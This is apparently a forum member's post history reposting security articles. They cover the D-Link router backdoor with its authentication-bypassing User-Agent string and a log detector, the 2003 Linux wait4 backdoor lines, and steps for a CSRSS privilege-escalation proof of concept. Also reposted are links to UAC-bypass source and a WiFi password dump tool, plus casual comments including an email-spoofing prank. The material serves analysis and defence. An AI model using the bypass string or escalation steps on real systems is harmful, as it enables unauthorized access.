Everything posted by Nytro
-
Reverse Engineering a D-Link Backdoor
By Craig | October 12, 2013

All right. It's Saturday night, I have no date, a two-liter bottle of Shasta and my all-Rush mix-tape... On a whim I downloaded firmware v1.13 for the DIR-100 revA. Binwalk quickly found and extracted a SquashFS file system, and soon I had the firmware's web server (/bin/webs) loaded into IDA:

[Image: Strings inside /bin/webs]

Based on the above strings listing, the /bin/webs binary is a modified version of thttpd which provides the administrative interface for the router. It appears to have been modified by Alphanetworks (a spin-off of D-Link). They were even thoughtful enough to prepend many of their custom function names with the string "alpha":

[Image: Alphanetworks' custom functions]

The alpha_auth_check function sounds interesting! This function is called from a couple of different locations, most notably from alpha_httpd_parse_request:

[Image: Function call to alpha_auth_check]

We can see that alpha_auth_check is passed one argument (whatever is stored in register $s2); if alpha_auth_check returns -1 (0xFFFFFFFF), the code jumps to the end of alpha_httpd_parse_request, otherwise it continues processing the request. Some further examination of the use of register $s2 prior to the alpha_auth_check call indicates that it is a pointer to a data structure which contains char* pointers to various pieces of the received HTTP request, such as HTTP headers and the requested URL:

[Image: $s2 is a pointer to a data structure]

We can now define a function prototype for alpha_auth_check and begin to enumerate elements of the data structure:

```c
struct http_request_t {
    char unknown[0xB8];
    char *url;      // At offset 0xB8 into the data structure
};

int alpha_auth_check(struct http_request_t *request);
```

alpha_auth_check itself is a fairly simple function. It does a few strstr's and strcmp's against some pointers in the http_request_t structure, then calls check_login, which actually does the authentication check. If the calls to any of the strstr's / strcmp's or check_login succeed, it returns 1; else, it redirects the browser to the login page and returns -1:

[Image: alpha_auth_check code snippet]

Those strstr's look interesting. They take the requested URL (at offset 0xB8 into the http_request_t data structure, as previously noted) and check to see if it contains the strings "graphic/" or "public/". These are sub-directories under the device's web directory, and if the requested URL contains one of those strings, then the request is allowed without authentication. It is the final strcmp, however, which proves a bit more compelling:

[Image: An interesting string comparison in alpha_auth_check]

This is performing a strcmp between the string pointer at offset 0xD0 inside the http_request_t structure and the string "xmlset_roodkcableoj28840ybtide"; if the strings match, the check_login function call is skipped and alpha_auth_check returns 1 (authentication OK). A quick Google for the "xmlset_roodkcableoj28840ybtide" string turns up only a single Russian forum post from a few years ago, which notes that this is an "interesting line" inside the /bin/webs binary. I'd have to agree.

So what is this mystery string getting compared against? If we look back in the call tree, we see that the http_request_t structure pointer is passed around by a few functions. It turns out that the pointer at offset 0xD0 in the http_request_t structure is populated by the httpd_parse_request function:

[Image: Checks for the User-Agent HTTP header]
[Image: Populates http_request_t + 0xD0 with a pointer to the User-Agent header string]

This code is effectively:

```c
if (strstr(header, "User-Agent:") != NULL) {
    char *value = header + strlen("User-Agent:");
    value += strspn(value, " \t");      // skip the whitespace after the colon
    request->user_agent = value;        // stored at http_request_t + 0xD0
}
```

Knowing that offset 0xD0 in http_request_t contains a pointer to the User-Agent header, we can now re-construct the alpha_auth_check function:

```c
#define AUTH_OK   1
#define AUTH_FAIL -1

int alpha_auth_check(struct http_request_t *request)
{
    if (strstr(request->url, "graphic/") ||
        strstr(request->url, "public/") ||
        strcmp(request->user_agent, "xmlset_roodkcableoj28840ybtide") == 0)
    {
        return AUTH_OK;
    }
    else
    {
        // These arguments (fields at offsets 0xC and 0xE0) are probably
        // user/pass or session info
        if (check_login(request->0xC, request->0xE0) != 0)
        {
            return AUTH_OK;
        }
    }

    return AUTH_FAIL;
}
```

In other words, if your browser's user agent string is "xmlset_roodkcableoj28840ybtide" (no quotes), you can access the web interface without any authentication and view/change the device settings (a DI-524UP is shown, as I don't have a DIR-100 and the DI-524UP uses the same firmware):

[Image: Accessing the admin page of a DI-524UP]

Based on the source code of the HTML pages and some Shodan search results, it can be reasonably concluded that the following D-Link devices are likely affected:
- DIR-100
- DI-524
- DI-524UP
- DI-604S
- DI-604UP
- DI-604+
- TM-G5240

Additionally, several Planex routers also appear to use the same firmware:
- BRL-04UR
- BRL-04CW

You stay classy, D-Link.

Source: Reverse Engineering a D-Link Backdoor - /dev/ttyS0
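A defender-side check for the bypass described above, added here as an example and not code from the original post or from the firmware: it scans HTTP log lines for requests whose User-Agent is exactly the string the firmware's strcmp accepts. It assumes requests to the router have been recorded in Apache Combined Log Format (for instance by a monitoring proxy or a capture export); the log lines below are constructed, not real traffic.

```c
#include <stdio.h>
#include <string.h>

/* The User-Agent value that the reversed alpha_auth_check compares against. */
#define DLINK_BACKDOOR_UA "xmlset_roodkcableoj28840ybtide"

/* Copy the last double-quoted field of a Combined Log Format line into out.
 * In that format the last quoted field is the User-Agent. Returns 0 on
 * success, -1 if the line has no complete quoted field. */
static int last_quoted_field(const char *line, char *out, size_t outlen)
{
    const char *end = strrchr(line, '"');
    if (end == NULL || end == line)
        return -1;

    const char *start = end - 1;
    while (start > line && *start != '"')
        start--;
    if (*start != '"')
        return -1;

    size_t len = (size_t)(end - start - 1);
    if (len >= outlen)
        len = outlen - 1;
    memcpy(out, start + 1, len);
    out[len] = '\0';
    return 0;
}

/* Returns 1 if the line's User-Agent is exactly the backdoor string.
 * The firmware uses strcmp, so an exact match is the condition that
 * skips check_login; substring matches are not flagged. */
int is_backdoor_request(const char *line)
{
    char ua[256];
    if (last_quoted_field(line, ua, sizeof ua) != 0)
        return 0;
    return strcmp(ua, DLINK_BACKDOOR_UA) == 0;
}

/* Scan a NULL-terminated array of log lines, report each hit, and return
 * the number of unauthenticated-by-User-Agent requests found. */
int count_backdoor_requests(const char *const *lines)
{
    int hits = 0;
    for (size_t i = 0; lines[i] != NULL; i++) {
        if (is_backdoor_request(lines[i])) {
            printf("ALERT: backdoor User-Agent on line %zu: %s\n", i + 1, lines[i]);
            hits++;
        }
    }
    return hits;
}

/* Constructed sample log lines (not real traffic). */
static const char *const SAMPLE_LOG[] = {
    "10.0.0.5 - - [12/Oct/2013:21:03:11 +0000] \"GET /index.htm HTTP/1.1\" "
    "401 0 \"-\" \"Mozilla/5.0 (X11; Linux x86_64)\"",
    "10.0.0.9 - - [12/Oct/2013:21:04:02 +0000] \"GET /tools_admin.htm HTTP/1.1\" "
    "200 4812 \"-\" \"xmlset_roodkcableoj28840ybtide\"",
    "10.0.0.5 - - [12/Oct/2013:21:04:30 +0000] \"GET /public/logo.gif HTTP/1.1\" "
    "200 1201 \"-\" \"Mozilla/5.0 (X11; Linux x86_64)\"",
    NULL
};

int main(void)
{
    int hits = count_backdoor_requests(SAMPLE_LOG);
    printf("%d suspicious request(s)\n", hits);
    return hits ? 1 : 0;
}
```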
-
[h=3]CreateRemoteThread vs. RtlCreateUserThread[/h]
In this post I will shed light on a slight difference between the "CreateRemoteThread" and "RtlCreateUserThread" functions. I will also show how this slight difference could affect your code, especially if you are implementing an anti-attaching trick.

The difference is in the way the CONTEXT structure is initialized for the new thread. Let's first take the "CreateRemoteThread" function in disassembly. On Windows XP SP3, at address 0x7C810550, we can see a call to the non-exported "_BaseInitializeContext@20" function which, as its name implies, sets initial values for the registers of the CONTEXT structure. Here we focus on only two registers, EIP and EAX, which are set in the following manner:

1) The EIP register is set to the address of either "_BaseThreadStartThunk@8" or "_BaseProcessStartThunk@8", depending on the fifth parameter (in this case, the fifth parameter is set to TRUE and EIP is set to the address of "_BaseThreadStartThunk@8").
2) The EAX register is set to the user-defined entry point (user-defined here means the value passed to the "CreateRemoteThread" function in the "lpStartAddress" parameter).

The very first thing we conclude is that "BaseThreadStartThunk@8" later executes the user-defined entry point.

Now let's take the "RtlCreateUserThread" function in disassembly and see how the CONTEXT structure for the new thread is initialized. As you can see in the image above, a different function, "RtlInitializeContext", is used for this task. Going into this function, we can see that it is as simple as setting:

1) The EAX register to zero.
2) The EIP register to the user-defined entry point.

A question arises here: what is this useful for? If a thread tries to query its own entry point by calling the "ZwQueryInformationThread" function with the "ThreadInformationClass" parameter set to ThreadQuerySetWin32StartAddress, then the initial value of EAX is the value returned in the "ThreadInformation" parameter.

In most cases, this is okay, since almost all threads are created by the "CreateRemoteThread" function and hence the user-defined entry point is always returned. But threads created by the "RtlCreateUserThread" function (e.g. threads created by debuggers to attach to running processes) will not be able to query their own entry point using the "ZwQueryInformationThread" function, since the value returned in the "ThreadInformation" parameter will always be zero, as the initial value for EAX was zero. Imagine a TLS callback running in the context of the attaching thread and trying to query the thread's entry point by calling the "ZwQueryInformationThread" function as part of detecting the debugger: the entry point returned will be zero, since the initial value of EAX was zero.

A good solution for this problem is using the "NtQuerySystemInformation" function with the "SystemInformationClass" parameter set to SystemProcessesAndThreadsInformation to get information about all current processes and threads, then locating the proper thread and its SYSTEM_THREAD_INFORMATION structure. Once the right structure is found, the thread entry point can easily be seen in the "StartAddress" member.

The code showing how to use the "NtQuerySystemInformation" function to extract thread entry points can be found here. An example demonstrating how to use the "NtQuerySystemInformation" function as an anti-attaching trick can be found here.

N.B. This topic has been tested on Windows XP SP3.
You can follow me on Twitter @waleedassar
Source: waliedassar: CreateRemoteThread vs. RtlCreateUserThread
-
Supposedly it's for our safety, it protects us from terrorists. Slaves of the Americans. Go Russia!
-
Yes, about 3 years ago I also sent an email to the students at my faculty, "from" the address of the professor whose answers everyone was eager to get. It's useful for a laugh.
-
University is necessary! If you have a bachelor's degree (from a large part of the faculties), you practically get 16% more salary. Of course, you don't learn much there: crap subjects, and the useful ones may not be taught well... But if you like it and want to work in this field, get off your fucking ass and learn on your own. When it comes to getting hired, you also have to prove to employers that you know something. How do you do that? You show them the projects you've done. Have you done any? Do them. Or go jerk off. It's your future, it's your choice.
-
It would by no means be one where you give your real details: phone numbers, photos of yourself (which often contain the GPS location where they were taken), your friends, the places you frequent... I would advise you to clean up your profile a little and delete as many personal things as possible.
-
Anyway, the theme is bought, it was paid for by kwe.
-
I tried 2 (random) C++ books and they work. You get both the picture and a direct download link. Which one exactly doesn't work for you?
-
[h=5]Free e-books.[/h]
1. Linux: http://www.efytimes.com/e1/fullnews.asp?edid=116902 (Top 10 Most Wanted Linux Books)
2. Assembly: http://www.efytimes.com/e1/fullnews.asp?edid=117964
3. C: 35 Free eBooks On C Programming
4. C++: http://www.efytimes.com/e1/fullnews.asp?edid=117660
5. C#: http://www.efytimes.com/e1/fullnews.asp?edid=117598
6. Java: http://www.efytimes.com/e1/fullnews.asp?edid=117834
7. Python: http://www.efytimes.com/e1/fullnews.asp?edid=117094
8. Perl: http://efytimes.com/e1/fullnews.asp?edid=117324
9. Ruby: 22 Free eBooks On Ruby
10. Javascript: http://www.efytimes.com/e1/fullnews.asp?edid=117236
11. JQuery: http://www.efytimes.com/e1/fullnews.asp?edid=117488
-
Ctrl + F5. It's only on your end.
-
Regarding the button problem, post a screenshot of the page too. Regarding the theme? Copyright? Huh? With how many problems this piece-of-crap theme has had, I'm not giving them "copyright", I'm telling the ones who made it to go fuck themselves.
-
#ro0ted Attacking SIP/VoIP Servers by Faith
Source: https://www.cyberguerrilla.org/blog/?p=15957
-
Paunch, the author of Blackhole Exploit kit arrested in Russia
Wang Wei, The Hacker News - Monday, October 07, 2013

According to a security analyst, Maarten Boone, working at the Fox-IT company, the developer of the notorious Blackhole Exploit Kit, 'Paunch', and his partners were arrested in Russia recently.

Blackhole Exploit Kit, which is responsible for the majority of web attacks today, is crimeware that makes it simple for just about anyone to build a botnet. This malware kit, developed by a hacker who uses the nickname "Paunch" and his team, has gained wide adoption and is currently one of the most common exploit frameworks used for web-based malware delivery.

The Blackhole exploit kit is a framework for delivering exploits via compromised or third-party websites; it serves up a range of old and new exploits for Oracle's Java, Adobe's Flash and other popular software to take control of victims' machines.

At the time of writing, no police authority or press outlet has confirmed the claim made by Maarten about the arrest of the malware author. Please stay tuned to THN for updates about the story.

In April 2013, the Russian hackers and developers behind the Carberp botnet, which stole millions from bank accounts worldwide, were also arrested.

Source: Paunch, the author of Blackhole Exploit kit arrested in Russia - The Hacker News
-
[h=1]The Linux Backdoor Attempt of 2003[/h]
October 9, 2013 By Ed Felten

Josh wrote recently about a serious security bug that appeared in Debian Linux back in 2006, and whether it was really a backdoor inserted by the NSA. (He concluded that it probably was not.) Today I want to write about another incident, in 2003, in which someone tried to backdoor the Linux kernel. This one was definitely an attempt to insert a backdoor. But we don’t know who it was that made the attempt—and we probably never will.

Back in 2003 Linux used a system called BitKeeper to store the master copy of the Linux source code. If a developer wanted to propose a modification to the Linux code, they would submit their proposed change, and it would go through an organized approval process to decide whether the change would be accepted into the master code. Every change to the master code would come with a short explanation, which always included a pointer to the record of its approval.

But some people didn’t like BitKeeper, so a second copy of the source code was kept so that developers could get the code via another code system called CVS. The CVS copy of the code was a direct clone of the primary BitKeeper copy.

But on Nov. 5, 2003, Larry McVoy noticed that there was a code change in the CVS copy that did not have a pointer to a record of approval. Investigation showed that the change had never been approved and, stranger yet, that this change did not appear in the primary BitKeeper repository at all. Further investigation determined that someone had apparently broken in (electronically) to the CVS server and inserted this change.

What did the change do? This is where it gets really interesting. The change modified the code of a Linux function called wait4, which a program could use to wait for something to happen. Specifically, it added these two lines of code:

```c
if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
```

[Exercise for readers who know the C programming language: What is unusual about this code? Answer appears below.]

A casual reading by an expert would interpret this as innocuous error-checking code to make wait4 return an error code when wait4 was called in a certain way that was forbidden by the documentation. But a really careful expert reader would notice that, near the end of the first line, it said “= 0” rather than “== 0”. The normal thing to write in code like this is “== 0”, which tests whether the user ID of the currently running code (current->uid) is equal to zero, without modifying the user ID. But what actually appears is “= 0”, which has the effect of setting the user ID to zero.

Setting the user ID to zero is a problem because user ID number zero is the “root” user, which is allowed to do absolutely anything it wants—to access all data, change the behavior of all code, and to compromise entirely the security of all parts of the system. So the effect of this code is to give root privileges to any piece of software that called wait4 in a particular way that is supposed to be invalid. In other words … it’s a classic backdoor.

This is a very clever piece of work. It looks like innocuous error checking, but it’s really a back door. And it was slipped into the code outside the normal approval process, to avoid any possibility that the approval process would notice what was up.

But the attempt didn’t work, because the Linux team was careful enough to notice that this code was in the CVS repository without having gone through the normal approval process. Score one for Linux.

Could this have been an NSA attack? Maybe. But there were many others who had the skill and motivation to carry out this attack. Unless somebody confesses, or a smoking-gun document turns up, we’ll never know.

[Post edited (2013-10-09) to correct the spelling of Larry McVoy's name.]
Source: https://freedom-to-tinker.com/blog/felten/the-linux-backdoor-attempt-of-2003/
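To make the "= 0" versus "== 0" difference concrete, here is an added C example (not from the original post and not Linux kernel code) that runs the backdoored check and the honest one against a stand-in task structure from an unprivileged caller. The `struct task` and the `__WCLONE`/`__WALL` definitions are assumed stand-ins for the kernel's own.

```c
#include <stdio.h>
#include <errno.h>      /* EINVAL */

/* Stand-ins for the kernel's wait4 option flags (same values Linux uses). */
#ifndef __WCLONE
#define __WCLONE 0x80000000u
#endif
#ifndef __WALL
#define __WALL   0x40000000u
#endif

/* Minimal stand-in for the kernel's task_struct; only uid matters here. */
struct task {
    unsigned int uid;   /* 0 is root */
};

/* The two lines exactly as the 2003 CVS change wrote them: note "= 0".
 * An assignment evaluates to the value assigned, here 0, so the condition
 * is always false: retval is never set, but current->uid has been
 * overwritten with 0 as a side effect of "checking" it. */
long backdoored_check(unsigned int options, struct task *current)
{
    long retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* What a casual reader assumes the code says: "== 0" compares the uid
 * and leaves it unchanged. */
long honest_check(unsigned int options, struct task *current)
{
    long retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

/* Calls the "forbidden" flag combination from a task with uid 1000 through
 * both versions. Returns 1 if the backdoored version reported no error and
 * left the caller running as root, while the honest one left uid alone. */
int demonstrate(void)
{
    struct task honest_task = { .uid = 1000 };
    long r_honest = honest_check(__WCLONE | __WALL, &honest_task);
    printf("honest:     retval=%ld uid=%u\n", r_honest, honest_task.uid);

    struct task victim = { .uid = 1000 };
    long r_backdoor = backdoored_check(__WCLONE | __WALL, &victim);
    printf("backdoored: retval=%ld uid=%u\n", r_backdoor, victim.uid);

    return r_backdoor == 0 && victim.uid == 0 && honest_task.uid == 1000;
}

int main(void)
{
    return demonstrate() ? 0 : 1;
}
```

Note that the extra parentheses around `current->uid = 0` are also what make the line read like a comparison at a glance; any other options value short-circuits the `&&` and leaves the uid untouched, so the effect only appears for the one "invalid" call pattern.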
-
[h=1]Anonymous no more: Twitter engineer, UConn security analyst among 13 indicted for 'Operation Payback'[/h]
[h=2]Not all the people named in the FBI indictment fit the hacker stereotype[/h]
By Greg Sandoval on October 8, 2013 07:11 pm

Some of the men indicted last week for allegedly taking part in the scores of denial-of-service attacks launched by hacktivist group Anonymous in 2010 don't fit the stereotype of a pajamas-wearing teen hacker causing havoc from mom's basement. For example, The Verge has learned that defendant Phillip Simpson is a 28-year-old IT professional who works for a test-preparation service. Anthony Tadros, 22, is a student at the University of Connecticut, who ironically once worked as a security analyst for the school, according to his LinkedIn profile. Geoffrey Commander is 65 years old. And then there's Ryan Gubele, a 27-year-old who is a former contract employee for Amazon. In June, Gubele began working as a site reliability engineer for Twitter — and is currently still employed there.

Last week, the US Department of Justice alleged in a 28-page indictment that Gubele and the other 12 defendants helped Anonymous, the hacktivist collective, disrupt or cause the collapse of web sites operated by Bank of America, MasterCard and multiple global antipiracy groups. Some of the companies were attacked for refusing to process donations made to WikiLeaks, the group that published leaked US diplomatic cables. Others came under fire for supporting antipiracy efforts. Anonymous dubbed the DDoS campaign Operation Payback.

In the indictment, federal prosecutors allege that it was Gubele who aided Anonymous by tracking the effectiveness of the group's attacks on the Motion Picture Association of America, the trade group for the Hollywood studios. They also accuse him of illegally accessing computer systems of at least one of the targets during Operation Payback, which began in September 2010 and ended the following January. The indictment doesn't say whether Gubele played any role in the December 2010 attack on Amazon. According to Gubele's LinkedIn profile, he began working for the web retailer in August 2010 and departed the same month that Operation Payback concluded.

Gubele and Simpson did not respond to interview requests. Twitter and Amazon declined to comment. Tadros, the security analyst, said in a text: "It's in my best interest not to answer any questions about my situation while the case is ongoing."

[h=3]Feds likely want to send a message[/h]
US law enforcement has begun cracking down on computer crime and appears to be making an extra effort to track Anonymous members, who consider themselves activists for social change and come from all over the globe. During the past decade, the group has hacked or launched denial of service attacks against the Church of Scientology, numerous governments, Sony, the New York Stock Exchange, and sites hosting child porn. While numerous arrests have been made, the percentage of Anonymous members tried for computer offenses is believed to be a tiny fraction of the group’s potential members. Nonetheless, the US government likely wants to send a message.

Source: Anonymous no more: Twitter engineer, UConn security analyst among 13 indicted for 'Operation Payback' | The Verge
-
Detecting Avast Antivirus Via Web Browsers
Description: This is the method I use for detecting Avast antivirus. You can use it with other antiviruses too; all you need is to change the image path. If you tested that with other software/antivirus please post it in the comments below. This is the online demo of the method described: Test_Avast
Source: Detecting Avast Antivirus Via Web Browsers

Simple and effective. Another method would be to put blocked content on a site, have that content appear in a hidden frame, and use JS to check whether "content blocked" or the original content shows up.
-
Derbycon 2013 - Pass-The-Hash 2: The Admin’s Revenge - Skip Duckwall, Chris Campbell
Description: Some vulnerabilities just can’t be patched. Pass-The-Hash attacks against Windows enterprises are still successful and are more popular than ever. Since the PTH-Suite was released at BlackHat last year, Microsoft published their guide for mitigating the attack. Skip and Chris will cover some of the shortcomings in their strategies and offer practical ways to detect and potentially prevent hashes from being passed on your network. Learn how to stop an attacker’s lateral movement in your enterprise.
Bio: “Chris: Co-presented the PTH talk last year at Blackhat. Also spoke at BsidesLV, Derbycon, Shmoocon & BsidesPR. www.obscuresec.com, @obscuresec. Works for Crucial Security (Harris Corp). Skip: Co-presented the PTH talk last year at Blackhat. Also spoken at Defcon, Derbycon. passing-the-hash.blogspot.com, @passingthehash on twitter. Works for Accuvant Labs”
For more information please visit: DerbyCon : Louisville, Kentucky; Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos)
Source: Derbycon 2013 - Pass-The-Hash 2: The Admin’s Revenge - Skip Duckwall, Chris Campbell
-
WiFi Password Dump

[h=3]About[/h]
WiFi Password Dump is the free command-line tool to quickly recover all the wireless account passwords stored on your system. It automatically recovers all types of wireless keys/passwords (WEP/WPA/WPA2 etc.) stored by the Windows Wireless Configuration Manager. For each recovered WiFi account, it displays the following information:
- WiFi Name (SSID)
- Security Settings (WEP-64/WEP-128/WPA2/AES/TKIP)
- Password Type
- Password in Hex format
- Password in clear text

Being a command-line tool makes it useful for penetration testers and forensic investigators. For the GUI version check out the Wi-Fi Password Decryptor. It works on both 32-bit & 64-bit platforms, from Windows Vista to Windows 8.

[h=3]WiFi Password Secrets[/h]
Depending on the platform, the 'Wireless Configuration Manager' uses different techniques and storage locations to securely store the WiFi settings.

On Vista and higher systems all the wireless parameters, including SSID, authentication method & encrypted password, are stored in the following file:

C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\{Random-GUID}.xml

Here each wireless device is represented by its interface GUID {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}, and all the wireless settings for this device are stored in an XML file with a random GUID name.

If you are interested to know how these WiFi settings are stored and how 'WiFi Password Decryptor' actually recovers the passwords, read our research article: Exposing the WiFi Password Secrets

[h=3]How to use?[/h]
WiFi Password Dump is a very easy to use tool. It is a command-line/console based tool, hence you have to launch it from the command prompt (cmd.exe) as Administrator. Here is the simple usage information:
1. Launch the command prompt (cmd.exe) on your system as Administrator.
2. In the cmd prompt, move to the directory where you have installed or copied the WiFiPasswordDump tool.
3. Now run the tool by just typing WiFiPasswordDump.exe
4. It will automatically discover and display all the recovered wireless passwords, as shown in the screenshot below.

[h=3]Screenshots[/h]
[Image] Screenshot 1: 'WiFiPasswordDump' showing all the recovered wireless passwords from a Windows 7 system.

[h=3]Release History[/h]
Version 1.0: 8th Oct 2013
First public release of WiFi Password Dump.

[h=3]Download[/h]
FREE Download WiFi Password Dump v1.0
License: Freeware
Platform: Windows Vista, Windows 2008, Windows 7, Windows 8

Source: WiFi Password Dump : Free Command-line Tool to Recover Wireless Passwords
-
[h=1]PhysicsJS (Yes, a JavaScript Physics engine)[/h]
In today's Web Wednesday post we're highlighting something you might think a little oxymoronic, a JavaScript Physics engine. It's still in an Alpha status, but even so, it's looking pretty cool...

[h=2]PhysicsJS[/h]
A modular, extendable, and easy-to-use physics engine for javascript

PhysicsJS is still under development (alpha version 0.5.1), and documentation is unfinished. Feel free to use it, just be warned that the API is in flux and better documentation is on its way! (Contributors and help needed!)

[h=4]Features[/h]
- Use as an AMD Module (requireJS), or global namespace.
- Modular! Only load what you need. The core library is only 31k minified.
- Extendable! Don’t like the collision detection algorithm? Replace it with your own!
- Not tied to a specific renderer. Display it in DOM, HTML5 Canvas, or whatever…
- Easy! It’s a library written IN javascript… not C compiled into javascript. The syntax is familiar for javascript developers.
- Extensions to support points, circles, and arbitrary convex polygons.
- Extensions to support constant gravity, newtonian gravity, collisions, and verlet constraints.

The fastest way to get a feel for what's possible is by checking out the Demos.
[h=2]Demos[/h]

There's even documentation already too.
[h=2]https://github.com/wellcaffeinated/PhysicsJS/wiki[/h]
Introductory documentation can be found on the PhysicsJS website. The wiki contains more advanced usage instructions. Due to the newness of this library, documentation is non-exhaustive. If there are any points of confusion, please feel free to log an issue or contact me. You can also edit the wiki yourself to fill in the gaps. Any help with documenting is appreciated.

[h=4]Topics[/h]
- Fundamentals
- Scratchpads - they speed up computations
- Bodies
- PubSub
- Behaviors
- Collisions
- Integrators
- Renderers

And the source is officially available too:
[h=2]https://github.com/wellcaffeinated/PhysicsJS[/h]
Source: PhysicsJS (Yes, a JavaScript Physics engine) | Coding4Fun Blog | Channel 9
-
[h=1]C++ and the Windows Runtime[/h]
Date: September 6, 2013 from 9:00AM to 9:35AM, Day 3
Speakers: Aleš Holeček

In this talk, Ales discusses the evolution of the Windows platform and the story of its development, and the key role that C++ plays in it. In the spirit of "Going Native", the new platform and application model is written almost exclusively in C++.

Source: C++ and the Windows Runtime | GoingNative 2013 | Channel 9
-
Windows 7 UAC whitelist: Code-injection Issue (and more)

Quick Windows 7 RTM update: Everything below still applies to the final retail release of Windows 7 (and all updates as of 14/Sep/2011).

Quick Windows 8 update: Everything below still applies to the Windows 8 Developer Preview released on 13/Sep/2011. It is early days, of course, but from a quick look it does not seem that anything UAC-related has changed at all in Win8.

Contents:
- Win 7 UAC Code-Injection: Program & source-code
- Win 7 UAC Code-Injection: Video demonstrations
- Some Quotes
- Win 7 UAC Code-Injection: Summary
- Win 7 UAC Code-Injection: The good news
- Win 7 UAC Code-Injection: How it works
- UAC in Vista and Windows 7: Mistakes then and now (Better ways MS could've responded to complaints about Vista.)
- UAC Comparison: Two file-managers
- If a whitelist makes sense then it must be user-configurable
- Previous Windows 7 UAC issues
- To those saying, "but it requires code to get on the box"
- To those saying, "but UAC isn't a security boundary"
- To those saying, "but it's only a beta"
- Quick response to a couple of newer things

Program, Source Code and Step-by-Step Guide
While Windows 7 was still in beta, Microsoft said this was a non-issue, and ignored my offers to give them full details for several months, so there can't be an issue with making everything public now.
- Win7ElevateV2.zip (32-bit and 64-bit binaries; use the version for your OS.)
- Win7ElevateV2_Source.zip (C++ source code, and detailed guide to how it works.)
- Source in HTML format (for browsing online)
- Step-by-step guide (description of what the code does)

This works against the RTM (retail) and RC1 versions of Windows 7. It probably won't work with the old beta build 7000 due to changes in which apps can auto-elevate.

Microsoft could block the binaries via Windows Defender (update: they now do via MSE), or plug the CRYPTBASE.DLL hole, but unless they fix the underlying code-injection / COM-elevation problem the file copy stuff will still work. Fixing only the CRYPTBASE.DLL part, or blocking a particular EXE or DLL, just means someone has to find a slightly different way to take advantage of the file copy part. Finding the CRYPTBASE.DLL method took about 10 minutes, so I'd be surprised if finding an alternative took long.

Even if the hole is fixed, UAC in Windows 7 will remain unfair on third-party code and inflexible for users who wish to use third-party admin tools.

Source: Windows 7 UAC whitelist: Code-injection Issue (and more)
-
[h=1]Linux SNMP MIB Browser[/h]
An SNMP MIB browser is an indispensable tool for engineers and system administrators to manage SNMP-enabled network devices such as routers, switches, servers and workstations. The information provided by SNMP includes uptime, interface traffic data, routing information, TCP and UDP connection information, installed software, and much more. In this tutorial, I introduce qtmib, an easy-to-use SNMP browser available for Linux and published under the GPLv2 license. The program is built as a front-end for the net-snmp tools using the QT4 library.

[Image: qtmib browser window]

qtmib features
qtmib offers a number of powerful features:
- SNMP v1 and v2c support.
- OID translation.
- MIB search capabilities.
- A huge number of built-in MIBs.
- Support for adding private MIBs.
- Network discovery.
- Easy-to-read reports: system, interfaces, routing table, TCP/UDP connections, running processes, and installed software.

Installation
Installation follows the regular ./configure && make && sudo make install Unix pattern. You will need the net-snmp tools and QT4 development libraries as dependencies. An Ubuntu .deb package is also provided.

Screenshot tour
[Image: qtmib host selection]
[Image: qtmib network discovery]
[Image: qtmib report selection]

Source: Linux SNMP MIB Browser | l3net - a layer 3 networking blog
-
CVE-2011-1281 Privilege escalation in CSRSS proof of concept

After one year without blogging (all my apologies), I’m back. A few days ago I saw the Pwnie Awards nominations list; there were lots of interesting and sophisticated bug exploitations. But one attracted my attention: “Privilege escalation in CSRSS”, discovered by Matthew ‘j00ru’ Jurczyk. If you want to understand this vulnerability and the way to exploit it, read this excellent post: CVE-2011-1281: A story of a Windows CSRSS Privilege Escalation vulnerability | j00ru//vx tech blog. And if you’re not familiar with CSRSS I advise you to read this article or this one (in French).

So, to write the PoC we have to follow these steps:

1. Spray the shared WIN32K section, by creating a sufficient amount of USER objects. The section is then going to be mapped to every process running in the context of the local desktop, thus we can perform this step at this early point,
2. Create N instances of a process, each of which will create a single zombie console and then go idle,
3. Kill all N instances of the processes,
4. Create 3N local threads, (**)
5. Kill 2N threads (in the order described in the “Second Stage” section),
6. Kill the remaining N threads,
7. Emulate the win+u key presses, resulting in a new instance of UTILMAN.EXE being created,
8. Call SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, 0xFFF7, 0), triggering the execution of CreateRemoteThread on each of the N freed handles.

* – by creating a zombie console, we also mean replacing the original PropertiesProc address (used in kernel32!AllocConsole) with a custom pointer.
** – the technique is very time-sensitive. If any handle is picked / stored on the free-list between steps 3 and 4, then steps 5 and 6 might not succeed in setting up the expected free-list handle layout.

I won’t speak about the first step immediately, for different reasons. Let’s start with step two, “create a single zombie console”; for me it’s the hardest part. We have to code AllocConsole and AllocConsoleInternal (I only cover the Windows XP version for the moment). With AllocConsoleInternal we can control the PropRoutine & CtrlRoutine of the console. To code this function I started googling with “AllocConsoleInternal + PropRoutine + CtrlRoutine” and reached this function definition:

    BOOL APIENTRY AllocConsoleInternal(
        IN LPWSTR lpTitle,
        IN DWORD dwTitleLength,
        IN LPWSTR lpDesktop,
        IN DWORD dwDesktopLength,
        IN LPWSTR lpCurDir,
        IN DWORD dwCurDirLength,
        IN LPWSTR lpAppName,
        IN DWORD dwAppNameLength,
        IN LPTHREAD_START_ROUTINE CtrlRoutine,
        IN LPTHREAD_START_ROUTINE PropRoutine,
        IN OUT PCONSOLE_INFO pConsoleInfo)

With some calls to ntdll!CsrAllocateCaptureBuffer and ntdll!CsrCaptureMessageBuffer for desktop, title and current dir memory allocation, and then ntdll!CsrClientCallServer with an allocConsole request, we reach winsrv!SrvAllocConsole and then spawn a console. For testing we launch a broken console and kill its process and its parent process; after that we do a “right click + Properties/Defaults” on the broken console and then we have winsrv!InternalCreateCallbackThread executed with a freed handle (the killed parent process handle, precisely)!

Steps 3, 4, 5, 6 and 8 are quite easy. Step 7 (WIN+U emulation) too, but SetKeyboardState and PostMessage don’t work; we have to use keybd_event (deprecated) or SendInput to invoke utilman.exe. Therefore, with all these steps we are able to get CSRSS to call CreateRemoteThread with a system process handle and a controlled start address.

Now we need step one, “Spray the shared WIN32K section of the system process with USER objects”, and it’s done! For this we have to invoke utilman (WIN+U), which spawns three new processes:

    -> utilman.exe [NT AUTHORITY\SYSTEM]
